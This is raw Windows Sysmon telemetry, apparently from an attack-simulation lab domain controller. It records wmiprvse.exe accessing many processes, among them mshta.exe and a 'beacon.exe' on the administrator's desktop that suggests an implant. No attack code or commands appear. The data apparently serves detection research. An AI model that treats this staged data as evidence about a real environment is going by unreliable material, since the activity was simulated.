16:54:43.061{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1steieis.p4j.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_opv24mo1.lil.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 